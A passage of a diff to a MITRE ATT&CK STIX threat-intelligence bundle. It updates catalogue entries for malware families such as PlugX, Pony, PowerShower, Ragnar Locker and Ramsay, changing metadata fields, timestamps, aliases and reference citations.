"x_mitre_aliases": [
"POWERSOURCE",
"DNSMessenger"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
@@ -197996,16 +227264,16 @@
"labels": [
"malware"
],
- "modified": "2020-03-23T16:15:33.427Z",
+ "modified": "2020-06-23T20:16:28.982Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"POWERSTATS",
"Powermud"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -198033,13 +227301,13 @@
],
"modified": "2020-03-25T16:21:36.260Z",
"created": "2019-04-16T17:43:42.724Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"POWERTON"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46",
@@ -198069,20 +227337,27 @@
"labels": [
"malware"
],
- "modified": "2020-03-28T21:37:54.017Z",
+ "modified": "2020-07-06T16:11:56.562Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"POWRUNER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-06-25T22:31:02.691Z",
+ "labels": [
+ "malware"
],
+ "type": "malware",
+ "id": "malware--5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "PUNCHBUGGY",
+ "description": "[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -198103,9 +227378,9 @@
"description": "Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019."
},
{
- "source_name": "FireEye Fin8 May 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html",
"description": "Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html"
+ "source_name": "FireEye Fin8 May 2016"
},
{
"url": "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html",
@@ -198113,16 +227388,9 @@
"source_name": "FireEye Know Your Enemy FIN8 Aug 2016"
}
],
- "description": "[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)",
- "name": "PUNCHBUGGY",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "malware--5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
- "type": "malware",
- "labels": [
- "malware"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-30T02:40:51.738Z",
- "created": "2018-04-18T17:59:24.739Z",
"x_mitre_platforms": [
"Windows"
],
@@ -198171,14 +227439,14 @@
],
"modified": "2020-03-17T14:48:43.852Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PUNCHTRACK",
"PSVC"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e811ff6a-4cef-4856-a6ae-a7daf9ed39ae",
@@ -198215,13 +227483,13 @@
],
"modified": "2020-03-30T17:20:41.436Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Pasam"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--ae9d818d-95d0-41da-b045-9cabea1ca164",
@@ -198249,13 +227517,13 @@
],
"modified": "2020-03-30T17:21:09.930Z",
"created": "2017-05-31T21:32:35.780Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PinchDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--b96680d1-5eb3-4f07-b95c-00ab904ac236",
@@ -198287,13 +227555,13 @@
],
"modified": "2020-03-30T17:21:44.379Z",
"created": "2017-05-31T21:33:12.388Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Pisloader"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -198359,11 +227627,9 @@
"labels": [
"malware"
],
- "modified": "2020-03-27T21:54:12.551Z",
+ "modified": "2020-06-20T21:43:42.587Z",
"created": "2017-05-31T21:32:15.638Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"PlugX",
"DestroyRAT",
@@ -198371,7 +227637,43 @@
"Kaba",
"Korplug"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "created": "2020-04-27T20:21:16.487Z",
+ "modified": "2020-04-30T18:13:47.841Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "external_references": [
+ {
+ "external_id": "S0428",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0428"
+ },
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) is a Python-based remote access trojan (RAT) used in multiple campaigns against the private and public sectors in Azerbaijan, specifically ICS and SCADA systems in the energy sector. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare.(Citation: Talos PoetRAT April 2020) ",
+ "name": "PoetRAT",
+ "id": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "PoetRAT"
+ ]
},
{
"id": "malware--b42378e0-f147-496f-992a-26a49705395b",
@@ -198426,18 +227728,56 @@
],
"modified": "2020-03-25T13:56:40.675Z",
"created": "2017-05-31T21:32:15.263Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_contributors": [
+ "Darren Spruell"
+ ],
"x_mitre_aliases": [
"PoisonIvy",
"Poison Ivy",
"Darkmoon"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "name": "Pony",
+ "description": "[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0453",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0453"
+ },
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-25T21:57:40.642Z",
+ "created": "2020-05-21T21:03:35.244Z",
"x_mitre_contributors": [
- "Darren Spruell"
+ "Arie Olshtein, Check Point",
+ "Kobi Eisenkraft, Check Point"
],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Pony"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3",
@@ -198509,13 +227849,52 @@
],
"modified": "2020-03-30T17:22:08.256Z",
"created": "2017-05-31T21:33:19.746Z",
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "PowerDuke"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "id": "malware--53486bc7-7748-4716-8190-e4f1fde04c53",
+ "name": "PowerShower",
+ "description": "[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0441",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0441"
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-20T20:43:49.960Z",
+ "created": "2020-05-08T19:27:12.414Z",
"x_mitre_platforms": [
"Windows"
],
"x_mitre_aliases": [
- "PowerDuke"
+ "PowerShower"
],
- "x_mitre_version": "1.2"
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -198543,15 +227922,21 @@
],
"modified": "2020-03-30T17:22:45.321Z",
"created": "2019-06-21T17:23:27.855Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"PowerStallion"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:33:07.943Z",
+ "modified": "2020-03-30T02:39:23.582Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -198571,19 +227956,13 @@
"name": "Prikormka",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--37cc7eb6-12e3-467b-82e8-f20f2cc73c69",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T02:39:23.582Z",
- "created": "2017-05-31T21:33:07.943Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Prikormka"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -198613,15 +227992,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T02:40:30.618Z",
+ "modified": "2020-06-12T17:37:53.480Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Proton"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"object_marking_refs": [
@@ -198653,16 +228032,16 @@
],
"modified": "2020-03-30T17:23:20.589Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_contributors": [
- "Edward Millington"
+ "x_mitre_version": "1.2",
+ "x_mitre_aliases": [
+ "Proxysvc"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_aliases": [
- "Proxysvc"
- ],
- "x_mitre_version": "1.2"
+ "x_mitre_contributors": [
+ "Edward Millington"
+ ]
},
{
"id": "malware--dfb5fa9b-3051-4b97-8035-08f80aef945b",
@@ -198690,13 +228069,13 @@
],
"modified": "2020-03-30T17:23:59.127Z",
"created": "2017-05-31T21:32:53.268Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Psylo"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--5f9f7648-04ba-4a9f-bb4c-2a13e74572bd",
@@ -198711,7 +228090,7 @@
},
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -198722,15 +228101,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-28T21:38:16.382Z",
+ "modified": "2020-06-22T17:54:15.287Z",
"created": "2017-05-31T21:33:26.084Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Pteranodon"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -198762,13 +228141,13 @@
],
"modified": "2020-03-28T21:38:43.793Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"QUADAGENT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--8c553311-0baa-4146-997a-f79acef3d831",
@@ -198796,13 +228175,13 @@
],
"modified": "2020-03-30T17:24:58.616Z",
"created": "2017-05-31T21:32:38.480Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RARSTONE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c",
@@ -198834,15 +228213,21 @@
],
"modified": "2020-03-30T17:25:28.458Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RATANKBA"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-10-11T16:13:19.588Z",
+ "modified": "2019-10-16T15:34:22.990Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--065196de-d7e8-4888-acfb-b2134022ba1b",
"name": "RDFSNIFFER",
"description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)",
@@ -198862,19 +228247,13 @@
"description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators\u2019 New Tools and Techniques. Retrieved October 11, 2019."
}
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2019-10-16T15:34:22.990Z",
- "created": "2019-10-11T16:13:19.588Z",
- "x_mitre_version": "1.0",
"x_mitre_aliases": [
"RDFSNIFFER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "malware--b9eec47e-98f4-4b3c-b574-3fa8a87ebe05",
@@ -198906,13 +228285,13 @@
],
"modified": "2020-03-30T17:26:05.875Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RGDoor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e",
@@ -198940,13 +228319,13 @@
],
"modified": "2020-03-30T17:28:04.217Z",
"created": "2017-05-31T21:32:11.911Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RIPTIDE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -198974,13 +228353,13 @@
],
"modified": "2020-03-30T17:39:16.351Z",
"created": "2017-05-31T21:33:07.565Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"ROCKBOOT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
@@ -199003,9 +228382,9 @@
"source_name": "Talos ROKRAT"
},
{
- "source_name": "Talos Group123",
+ "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
- "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
+ "source_name": "Talos Group123"
},
{
"url": "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
@@ -199020,45 +228399,136 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T17:40:07.686Z",
+ "modified": "2020-05-21T17:07:02.274Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ROKRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
+ "created": "2017-05-31T21:33:26.565Z",
+ "modified": "2020-07-03T22:22:05.857Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "RTM",
- "description": "[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). (Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0148",
"external_id": "S0148"
},
+ {
+ "source_name": "Redaman",
+ "description": "(Citation: Unit42 Redaman January 2019)"
+ },
{
"url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
"source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "RTM",
+ "Redaman"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Arie Olshtein, Check Point",
+ "Kobi Eisenkraft, Check Point"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0481",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0481"
+ },
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ },
+ {
+ "source_name": "Cynet Ragnar Apr 2020",
+ "url": "https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/",
+ "description": "Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Ragnar Locker",
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)",
+ "id": "malware--54895630-efd2-4608-9c24-319de972a9eb",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T17:40:42.776Z",
- "created": "2017-05-31T21:33:26.565Z",
- "x_mitre_version": "1.1",
+ "modified": "2020-06-30T00:39:39.738Z",
+ "created": "2020-06-29T23:30:53.824Z",
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
- "RTM"
+ "Ragnar Locker"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0458",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0458"
+ },
+ {
+ "source_name": "Ramsay",
+ "description": "(Citation: Eset Ramsay May 2020)"
+ },
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, potentially from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)",
+ "name": "Ramsay",
+ "id": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T23:17:20.639Z",
+ "created": "2020-05-27T16:58:08.242Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Ramsay"
],
"x_mitre_platforms": [
"Windows"
@@ -199131,19 +228601,19 @@
],
"modified": "2020-03-30T03:01:39.526Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_contributors": [
+ "Walker Johnson"
+ ],
"x_mitre_aliases": [
"RawPOS",
"FIENDCRY",
"DUEBREW",
"DRIFTWOOD"
],
- "x_mitre_contributors": [
- "Walker Johnson"
- ],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--65341f30-bec6-4b1d-8abf-1a5620446c29",
@@ -199175,13 +228645,13 @@
],
"modified": "2020-03-30T17:41:10.175Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Reaver"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
@@ -199227,17 +228697,17 @@
],
"modified": "2020-03-30T21:01:05.439Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "RedLeaves",
- "BUGJUICE"
+ "x_mitre_contributors": [
+ "Edward Millington"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Edward Millington"
- ]
+ "x_mitre_aliases": [
+ "RedLeaves",
+ "BUGJUICE"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
@@ -199253,7 +228723,7 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"object_marking_refs": [
@@ -199263,15 +228733,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T17:48:05.793Z",
+ "modified": "2020-06-29T01:54:53.301Z",
"created": "2017-05-31T21:32:17.959Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Regin"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -199299,13 +228769,13 @@
],
"modified": "2020-03-30T18:04:25.880Z",
"created": "2019-04-17T19:18:00.270Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Remexi"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--4e6b9625-bbda-4d96-a652-b3bb45453f26",
@@ -199333,13 +228803,13 @@
],
"modified": "2020-03-31T12:40:01.208Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RemoteCMD"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--69d6f4a9-fcf0-4f51-bca7-597c51ad0bb8",
@@ -199376,15 +228846,15 @@
],
"modified": "2020-03-28T21:41:25.889Z",
"created": "2017-05-31T21:33:12.858Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Remsec",
"Backdoor.Remsec",
"ProjectSauron"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--bdb27a1d-1844-42f1-a0c0-826027ae0326",
@@ -199417,10 +228887,78 @@
],
"modified": "2020-03-30T18:05:10.885Z",
"created": "2019-05-02T01:07:36.780Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Revenge RAT"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0433",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0433"
+ },
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)",
+ "name": "Rifdoor",
